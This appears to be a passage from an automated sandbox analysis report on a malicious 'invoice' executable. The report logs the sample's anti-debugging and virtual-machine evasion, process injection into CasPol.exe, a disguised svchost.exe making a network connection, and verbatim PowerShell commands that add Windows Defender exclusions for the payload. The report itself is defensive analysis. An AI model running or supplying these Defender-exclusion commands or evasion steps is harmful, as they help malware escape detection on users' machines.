        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to delay execution (extensive OutputDebugStringW loop)Show sources
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeSection loaded: OutputDebugStringW count: 105
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4971
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2058
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1523
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 803
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 3816
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 5533
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 407
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 4484Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1412Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
        Source: powershell.exe, 00000005.00000003.412711238.0000000004F06000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: WerFault.exe, 0000001E.00000003.418868252.0000000005276000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000018.00000002.315192830.0000000000BE5000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: WerFault.exe, 0000001E.00000002.447288923.00000000051F0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW2>a6
        Source: CasPol.exe, 00000019.00000003.323506513.0000000001081000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: powershell.exe, 00000005.00000003.412711238.0000000004F06000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information queried: ProcessInformation

        Anti Debugging:

        barindex
        Contains functionality to hide a thread from the debuggerShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08396890 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,0839F0B7,00000000,00000000
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess queried: DebugPort
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess queried: DebugPort
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeNetwork Connect: 104.21.71.230 80
        Adds a directory exclusion to Windows DefenderShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B30008
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
